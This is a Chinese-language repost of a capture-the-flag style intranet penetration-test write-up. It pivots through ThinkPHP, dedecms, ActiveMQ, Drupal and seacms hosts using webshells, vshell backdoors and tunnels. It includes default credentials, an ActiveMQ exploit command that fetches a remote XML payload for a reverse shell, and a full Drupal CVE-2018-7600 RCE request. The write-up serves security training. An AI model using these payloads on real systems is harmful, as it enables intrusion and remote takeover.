某公司比赛内网渗透测试记录

admin 2025年7月7日23:07:32评论7 views字数 1996阅读6分39秒阅读模式

简介

此次渗透测试记录完全为比赛环境

入口点

http://172.16.200.40/

某公司比赛内网渗透测试记录

很正常的一个thinkphp的入口,直接利用历史工具进行扫描

某公司比赛内网渗透测试记录

那很简单了,直接进行getshell以后,蚁剑连接

某公司比赛内网渗透测试记录

通过vshell生成后门,然后进行管理

某公司比赛内网渗透测试记录

在根目录下拿到flag

某公司比赛内网渗透测试记录
flag4{08396b12-ca29-453a-9e40-ae15c95eff23}

第二层

然后查看网卡信息

某公司比赛内网渗透测试记录

发现网卡信息

172.16.200.40/24

随即利用fscan进行扫描,

某公司比赛内网渗透测试记录

注意到这个cms的信息

现在直接利用vshell进行隧道代理,然后去访问这个地址

http://172.16.200.60
某公司比赛内网渗透测试记录

然后我们利用bp的sock代理进行访问,也方便后续渗透抓包

某公司比赛内网渗透测试记录

直接打开bp内置的浏览器,访问上述cms的地址

某公司比赛内网渗透测试记录

常见的dedecms,直接尝试打一波默认弱口令

admin/admin
某公司比赛内网渗透测试记录

成功登录

某公司比赛内网渗透测试记录

这里直接上传木马即可,然后我们蚁剑走代理,直接访问其上传的木马

某公司比赛内网渗透测试记录

然后连接上传的木马

某公司比赛内网渗透测试记录

成功连接以后,对其进行上传vshell后门进行管理,这里注意,由于在内网环境,我们是直接访问不了cms这个服务器的,需要走代理,那这里只能进行一个正向木马的连接

某公司比赛内网渗透测试记录
某公司比赛内网渗透测试记录

然后添加即可

某公司比赛内网渗透测试记录

成功添加

某公司比赛内网渗透测试记录

根目录下获得flag

某公司比赛内网渗透测试记录
flag6{3cf567f4-fc85-4ffa-b64f-72b609072e10}

第三层

现在就是正常的渗透,对网卡进行收集,以及对其进行扫描

某公司比赛内网渗透测试记录

发现第二张网卡的信息

10.10.10.60/24

老样子,对其进行扫描

某公司比赛内网渗透测试记录

发现其10.10.10.70上面的一个端口存在activemq的默认密码,这种其实已经可想到activemq的cve漏洞

先对其控制的172.16.200.60上弄一个隧道代理,然后用bp去访问这个服务

某公司比赛内网渗透测试记录
某公司比赛内网渗透测试记录

后配置bp,去访问

某公司比赛内网渗透测试记录

默认密码

admin/admin
某公司比赛内网渗透测试记录

然后搜索此服务的cve漏洞

某公司比赛内网渗透测试记录

直接利用即可

先把kali的代理配置好

某公司比赛内网渗透测试记录

然后在已经控制的靶机的服务器上搭建一个http服务,利用python

某公司比赛内网渗透测试记录

然后再利用poc

proxychains java -jar activemq-exp.jar 10.10.10.70 61616 xml http://10.10.10.60/poc.xml
某公司比赛内网渗透测试记录

记得在10.10.10.60上监听4444端口

某公司比赛内网渗透测试记录

然后执行poc

某公司比赛内网渗透测试记录

成功反弹,在根目录下获得flag

flag7{5b458b1b-6668-42f7-9307-657941f3a0b0}

第四层

现在要利用反弹的shell进行一个vshell的上线,现在就是先生成正向的木马,进行上传到刚才10.10.10.60的靶机上

某公司比赛内网渗透测试记录

然后再反弹的shell中进行wget,并执行文件

某公司比赛内网渗透测试记录

执行以后现在就是,去正向连接

某公司比赛内网渗透测试记录
某公司比赛内网渗透测试记录

成功上线,老样子,进行网卡收集以及扫描

某公司比赛内网渗透测试记录

当然两张网卡都会扫

172.16.100.70/2410.10.10.70/24

直接开扫

某公司比赛内网渗透测试记录

注意到

http://172.16.100.30 poc-yaml-drupal-cve-2018-7600-rce drupal8

对activemq此服务器进行一个隧道代理

某公司比赛内网渗透测试记录

然后,直接bp配置好后进行访问

某公司比赛内网渗透测试记录

在对cve进行搜索

此处借用freebuf上的poc

https://www.freebuf.com/vuls/268189.html

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Host: xxxxContent-Type: application/x-www-form-urlencodedContent-Length: 103form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
某公司比赛内网渗透测试记录

成功执行,直接看根目录

flag3{023d904d-e16b-42ac-a52b-63b88fac702b}

现在还没完

某公司比赛内网渗透测试记录

发现一个新的站点

 http://172.16.100.50      code:200 len:18590  title:影视大全 - 最新电视剧,最新电影

直接访问

某公司比赛内网渗透测试记录

这里利用无影进行一个指纹识别

某公司比赛内网渗透测试记录

发现是seacms,这里因为靶场原因,登录不了后台,但其实内容为

seacms_CNVD-2020-22721_v10.1

大家自行尝试

内容转自先知社区,原作者1099509721598427

原文链接:https://xz.aliyun.com/news/18317

某公司比赛内网渗透测试记录

文末阅读福利

书中自有黄金屋,今天分享一套超齐全的【网络安全必看书籍】,一共有50多本,涉及各个方面,非常适合零基础及安全人学习手册~
某公司比赛内网渗透测试记录
扫描下方二维码
备注网络安全书籍汇总】
100%免费领取完整PDF
某公司比赛内网渗透测试记录

原文始发于微信公众号(马哥网络安全):某公司比赛内网渗透测试记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月7日23:07:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某公司比赛内网渗透测试记录https://cn-sec.com/archives/4228712.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息